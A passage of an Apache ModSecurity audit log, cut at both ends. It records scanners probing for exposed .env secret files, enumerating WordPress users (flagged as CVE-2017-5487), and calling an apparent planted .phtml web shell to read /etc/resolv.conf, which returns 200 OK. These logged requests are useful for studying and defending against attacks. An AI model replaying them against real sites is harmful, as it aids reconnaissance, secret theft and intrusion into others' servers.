"/.env-rce"] [unique_id "aE3gl_BViRrxRfhQ2snODQAAAAE"] Stopwatch: 1749934231363402 3085 (- - -) Stopwatch2: 1749934231363402 3085; combined=1897, p1=407, p2=1396, p3=18, p4=25, p5=50, sr=97, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --75eb8b29-Z-- --3f14dd62-A-- [15/Jun/2025:02:20:31.696729 +0530] aE3gl7JKIKEA2aX91NiwnwAAAAY 78.153.140.151 56562 127.0.0.1 7080 --3f14dd62-B-- GET /.env.sql HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 78.153.140.151 Connection: close Accept: */* User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; EIE10;ENUSWOL) --3f14dd62-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --3f14dd62-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".env.sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/.env.sql"] [unique_id "aE3gl7JKIKEA2aX91NiwnwAAAAY"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".env.sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "198.71.51.75"] [uri "/.env.sql"] [unique_id "aE3gl7JKIKEA2aX91NiwnwAAAAY"] Stopwatch: 1749934231693469 3304 (- - -) Stopwatch2: 1749934231693469 3304; combined=2041, p1=399, p2=1518, p3=22, p4=27, p5=75, sr=96, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --3f14dd62-Z-- --fa95bb12-A-- [15/Jun/2025:02:20:32.023849 +0530] aE3gmNlaOcxgn8EdjwOs9wAAAAc 78.153.140.151 56570 127.0.0.1 7080 --fa95bb12-B-- GET /.env_key HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 78.153.140.151 Connection: close Accept: */* User-Agent: Mozilla/5.0 (X11; CrOS x86_64 9334.72.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.140 Safari/537.36 --fa95bb12-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --fa95bb12-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/.env_key"] [unique_id "aE3gmNlaOcxgn8EdjwOs9wAAAAc"] Stopwatch: 1749934232020808 3084 (- - -) Stopwatch2: 1749934232020808 3084; combined=1887, p1=434, p2=1356, p3=19, p4=25, p5=53, sr=124, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --fa95bb12-Z-- --f81b8c15-A-- [15/Jun/2025:02:20:32.351208 +0530] aE3gmNAcUP5X8o425y3UCgAAAAQ 78.153.140.151 56582 127.0.0.1 7080 --f81b8c15-B-- GET /.env.sns HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 78.153.140.151 Connection: close Accept: */* User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.12) Gecko/20080208 Firefox/2.0b2 --f81b8c15-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --f81b8c15-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/.env.sns"] [unique_id "aE3gmNAcUP5X8o425y3UCgAAAAQ"] Stopwatch: 1749934232347912 3339 (- - -) Stopwatch2: 1749934232347912 3339; combined=2004, p1=572, p2=1338, p3=20, p4=24, p5=50, sr=128, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --f81b8c15-Z-- --39e7490d-A-- [15/Jun/2025:02:20:32.680629 +0530] aE3gmOUDs24sWFCii7A3qwAAAAo 78.153.140.151 56598 127.0.0.1 7080 --39e7490d-B-- GET /.env-ssl HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 78.153.140.151 Connection: close Accept: */* User-Agent: Mozilla/5.0 (Linux; Android 6.0.1; LG-M153 Build/MXB48T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.98 Mobile Safari/537.36 --39e7490d-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --39e7490d-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/.env-ssl"] [unique_id "aE3gmOUDs24sWFCii7A3qwAAAAo"] Stopwatch: 1749934232677860 2821 (- - -) Stopwatch2: 1749934232677860 2821; combined=1674, p1=412, p2=1173, p3=18, p4=22, p5=49, sr=95, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --39e7490d-Z-- --5f2bfc61-A-- [15/Jun/2025:02:20:33.011570 +0530] aE3gmfBViRrxRfhQ2snODgAAAAE 78.153.140.151 56610 127.0.0.1 7080 --5f2bfc61-B-- GET /.env-csp HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 78.153.140.151 Connection: close Accept: */* User-Agent: Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.1) --5f2bfc61-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --5f2bfc61-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/.env-csp"] [unique_id "aE3gmfBViRrxRfhQ2snODgAAAAE"] Stopwatch: 1749934233007722 3915 (- - -) Stopwatch2: 1749934233007722 3915; combined=2441, p1=452, p2=1833, p3=27, p4=36, p5=93, sr=166, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --5f2bfc61-Z-- --9f426a41-A-- [15/Jun/2025:02:20:33.345526 +0530] aE3gmWQ9wf_T5qIsnxeDOgAAAAI 78.153.140.151 56614 127.0.0.1 7080 --9f426a41-B-- GET /.env.ses HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 78.153.140.151 Connection: close Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/530.19.2 (KHTML, like Gecko) Version/4.0.2 Safari/530.19.1 --9f426a41-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --9f426a41-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/.env.ses"] [unique_id "aE3gmWQ9wf_T5qIsnxeDOgAAAAI"] Stopwatch: 1749934233342405 3164 (- - -) Stopwatch2: 1749934233342405 3164; combined=1961, p1=436, p2=1430, p3=20, p4=25, p5=50, sr=128, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --9f426a41-Z-- --76cd204a-A-- [15/Jun/2025:02:23:36.941105 +0530] aE3hT9AcUP5X8o425y3UTgAAAAQ 41.72.210.122 35600 127.0.0.1 7081 --76cd204a-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Host: www.dealsdray.com X-Real-IP: 41.72.210.122 X-Accel-Internal: /internal-nginx-static-location Connection: close Accept-Encoding: gzip, deflate, br Cookie: wordpress_test_cookie=WP%20Cookie%20check Referer: https://www.dealsdray.com/wp-json/wp/v2/users/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --76cd204a-F-- HTTP/1.1 401 Unauthorized X-Powered-By: PHP/8.3.22 X-Robots-Tag: noindex Link: <https://www.dealsdray.com/wp-json/>; rel="https://api.w.org/" X-Content-Type-Options: nosniff Access-Control-Expose-Headers: X-WP-Total, X-WP-TotalPages, Link Access-Control-Allow-Headers: Authorization, X-WP-Nonce, Content-Disposition, Content-MD5, Content-Type Allow: GET Vary: Origin Connection: close Content-Type: application/json; charset=UTF-8 --76cd204a-H-- Message: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||www.dealsdray.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||www.dealsdray.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] [hostname "www.dealsdray.com"] [uri "/wp-json/wp/v2/users/"] [unique_id "aE3hT9AcUP5X8o425y3UTgAAAAQ"] Apache-Handler: proxy:unix:/var/www/vhosts/system/dealsdray.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749934415750077 1191116 (- - -) Stopwatch2: 1749934415750077 1191116; combined=1763, p1=289, p2=1352, p3=0, p4=0, p5=122, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --76cd204a-Z-- --03d31a16-A-- [15/Jun/2025:02:23:45.398645 +0530] aE3hWIMswQnJ3NDxjDY-EwAAAAA 41.72.210.122 35360 127.0.0.1 7081 --03d31a16-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Host: www.dealsdray.com X-Real-IP: 41.72.210.122 X-Accel-Internal: /internal-nginx-static-location Connection: close Accept-Encoding: gzip, deflate, br Cookie: wordpress_test_cookie=WP%20Cookie%20check Referer: https://www.dealsdray.com/wp-json/wp/v2/users/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --03d31a16-F-- HTTP/1.1 401 Unauthorized X-Powered-By: PHP/8.3.22 X-Robots-Tag: noindex Link: <https://www.dealsdray.com/wp-json/>; rel="https://api.w.org/" X-Content-Type-Options: nosniff Access-Control-Expose-Headers: X-WP-Total, X-WP-TotalPages, Link Access-Control-Allow-Headers: Authorization, X-WP-Nonce, Content-Disposition, Content-MD5, Content-Type Allow: GET Vary: Origin Connection: close Content-Type: application/json; charset=UTF-8 --03d31a16-H-- Message: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||www.dealsdray.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||www.dealsdray.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] [hostname "www.dealsdray.com"] [uri "/wp-json/wp/v2/users/"] [unique_id "aE3hWIMswQnJ3NDxjDY-EwAAAAA"] Apache-Handler: proxy:unix:/var/www/vhosts/system/dealsdray.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749934424361319 1037403 (- - -) Stopwatch2: 1749934424361319 1037403; combined=2215, p1=379, p2=1734, p3=0, p4=0, p5=102, sr=128, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --03d31a16-Z-- --03ca9d4f-A-- [15/Jun/2025:02:23:57.256618 +0530] aE3hZNlaOcxgn8EdjwOtQAAAAAc 36.88.5.106 34798 127.0.0.1 7081 --03ca9d4f-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Host: www.dealsdray.com X-Real-IP: 36.88.5.106 X-Accel-Internal: /internal-nginx-static-location Connection: close Accept-Encoding: gzip, deflate, br Cookie: wordpress_test_cookie=WP%20Cookie%20check Referer: https://www.dealsdray.com/wp-json/wp/v2/users/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --03ca9d4f-F-- HTTP/1.1 401 Unauthorized X-Powered-By: PHP/8.3.22 X-Robots-Tag: noindex Link: <https://www.dealsdray.com/wp-json/>; rel="https://api.w.org/" X-Content-Type-Options: nosniff Access-Control-Expose-Headers: X-WP-Total, X-WP-TotalPages, Link Access-Control-Allow-Headers: Authorization, X-WP-Nonce, Content-Disposition, Content-MD5, Content-Type Allow: GET Vary: Origin Connection: close Content-Type: application/json; charset=UTF-8 --03ca9d4f-H-- Message: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||www.dealsdray.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||www.dealsdray.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] [hostname "www.dealsdray.com"] [uri "/wp-json/wp/v2/users/"] [unique_id "aE3hZNlaOcxgn8EdjwOtQAAAAAc"] Apache-Handler: proxy:unix:/var/www/vhosts/system/dealsdray.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749934436307905 948787 (- - -) Stopwatch2: 1749934436307905 948787; combined=2022, p1=427, p2=1479, p3=0, p4=0, p5=115, sr=128, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --03ca9d4f-Z-- --8b048b4d-A-- [15/Jun/2025:02:25:25.411270 +0530] aE3hvG1_24bael5AsqHGYQAAAAo 178.254.201.246 52346 127.0.0.1 7081 --8b048b4d-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Host: www.dealsdray.com X-Real-IP: 178.254.201.246 X-Accel-Internal: /internal-nginx-static-location Connection: close Accept-Encoding: gzip, deflate, br Cookie: wordpress_test_cookie=WP%20Cookie%20check Referer: https://www.dealsdray.com/wp-json/wp/v2/users/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --8b048b4d-F-- HTTP/1.1 401 Unauthorized X-Powered-By: PHP/8.3.22 X-Robots-Tag: noindex Link: <https://www.dealsdray.com/wp-json/>; rel="https://api.w.org/" X-Content-Type-Options: nosniff Access-Control-Expose-Headers: X-WP-Total, X-WP-TotalPages, Link Access-Control-Allow-Headers: Authorization, X-WP-Nonce, Content-Disposition, Content-MD5, Content-Type Allow: GET Vary: Origin Connection: close Content-Type: application/json; charset=UTF-8 --8b048b4d-H-- Message: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||www.dealsdray.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||www.dealsdray.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] [hostname "www.dealsdray.com"] [uri "/wp-json/wp/v2/users/"] [unique_id "aE3hvG1_24bael5AsqHGYQAAAAo"] Apache-Handler: proxy:unix:/var/www/vhosts/system/dealsdray.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749934524365675 1045686 (- - -) Stopwatch2: 1749934524365675 1045686; combined=2049, p1=349, p2=1571, p3=0, p4=0, p5=128, sr=106, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --8b048b4d-Z-- --913e143e-A-- [15/Jun/2025:02:25:34.223649 +0530] aE3hxSQOy0yoNZQ7dslLBAAAAAk 201.221.148.26 48230 127.0.0.1 7081 --913e143e-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Host: www.dealsdray.com X-Real-IP: 201.221.148.26 X-Accel-Internal: /internal-nginx-static-location Connection: close Accept-Encoding: gzip, deflate, br Cookie: wordpress_test_cookie=WP%20Cookie%20check Referer: https://www.dealsdray.com/wp-json/wp/v2/users/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --913e143e-F-- HTTP/1.1 401 Unauthorized X-Powered-By: PHP/8.3.22 X-Robots-Tag: noindex Link: <https://www.dealsdray.com/wp-json/>; rel="https://api.w.org/" X-Content-Type-Options: nosniff Access-Control-Expose-Headers: X-WP-Total, X-WP-TotalPages, Link Access-Control-Allow-Headers: Authorization, X-WP-Nonce, Content-Disposition, Content-MD5, Content-Type Allow: GET Vary: Origin Connection: close Content-Type: application/json; charset=UTF-8 --913e143e-H-- Message: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||www.dealsdray.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||www.dealsdray.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] [hostname "www.dealsdray.com"] [uri "/wp-json/wp/v2/users/"] [unique_id "aE3hxSQOy0yoNZQ7dslLBAAAAAk"] Apache-Handler: proxy:unix:/var/www/vhosts/system/dealsdray.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749934533309686 914039 (- - -) Stopwatch2: 1749934533309686 914039; combined=2123, p1=335, p2=1697, p3=0, p4=0, p5=90, sr=91, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --913e143e-Z-- --82c0b827-A-- [15/Jun/2025:02:25:57.558792 +0530] aE3h3J4hb3-ZG-auIyDLoQAAAAg 109.105.202.122 40580 127.0.0.1 7081 --82c0b827-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Host: www.dealsdray.com X-Real-IP: 109.105.202.122 X-Accel-Internal: /internal-nginx-static-location Connection: close Accept-Encoding: gzip, deflate, br Cookie: wordpress_test_cookie=WP%20Cookie%20check Referer: https://www.dealsdray.com/wp-json/wp/v2/users/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --82c0b827-F-- HTTP/1.1 401 Unauthorized X-Powered-By: PHP/8.3.22 X-Robots-Tag: noindex Link: <https://www.dealsdray.com/wp-json/>; rel="https://api.w.org/" X-Content-Type-Options: nosniff Access-Control-Expose-Headers: X-WP-Total, X-WP-TotalPages, Link Access-Control-Allow-Headers: Authorization, X-WP-Nonce, Content-Disposition, Content-MD5, Content-Type Allow: GET Vary: Origin Connection: close Content-Type: application/json; charset=UTF-8 --82c0b827-H-- Message: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||www.dealsdray.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||www.dealsdray.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] [hostname "www.dealsdray.com"] [uri "/wp-json/wp/v2/users/"] [unique_id "aE3h3J4hb3-ZG-auIyDLoQAAAAg"] Apache-Handler: proxy:unix:/var/www/vhosts/system/dealsdray.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749934556504520 1054360 (- - -) Stopwatch2: 1749934556504520 1054360; combined=2027, p1=345, p2=1564, p3=0, p4=0, p5=117, sr=106, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --82c0b827-Z-- --90feb500-A-- [15/Jun/2025:02:26:58.446597 +0530] aE3iGZ4hb3-ZG-auIyDLtAAAAAg 103.68.62.175 38150 127.0.0.1 7081 --90feb500-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Host: www.dealsdray.com X-Real-IP: 103.68.62.175 X-Accel-Internal: /internal-nginx-static-location Connection: close Accept-Encoding: gzip, deflate, br Cookie: wordpress_test_cookie=WP%20Cookie%20check Referer: https://www.dealsdray.com/wp-json/wp/v2/users/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --90feb500-F-- HTTP/1.1 401 Unauthorized X-Powered-By: PHP/8.3.22 X-Robots-Tag: noindex Link: <https://www.dealsdray.com/wp-json/>; rel="https://api.w.org/" X-Content-Type-Options: nosniff Access-Control-Expose-Headers: X-WP-Total, X-WP-TotalPages, Link Access-Control-Allow-Headers: Authorization, X-WP-Nonce, Content-Disposition, Content-MD5, Content-Type Allow: GET Vary: Origin Connection: close Content-Type: application/json; charset=UTF-8 --90feb500-H-- Message: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||www.dealsdray.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||www.dealsdray.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] [hostname "www.dealsdray.com"] [uri "/wp-json/wp/v2/users/"] [unique_id "aE3iGZ4hb3-ZG-auIyDLtAAAAAg"] Apache-Handler: proxy:unix:/var/www/vhosts/system/dealsdray.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749934617386689 1059983 (- - -) Stopwatch2: 1749934617386689 1059983; combined=1933, p1=320, p2=1513, p3=0, p4=0, p5=99, sr=89, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --90feb500-Z-- --a526ac01-A-- [15/Jun/2025:02:28:13.109511 +0530] aE3iZYMswQnJ3NDxjDY-fAAAAAA 44.205.74.196 38088 127.0.0.1 7081 --a526ac01-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=//etc&viewfile=//etc/resolv.conf HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 44.205.74.196 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --a526ac01-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3389 Connection: close Content-Type: 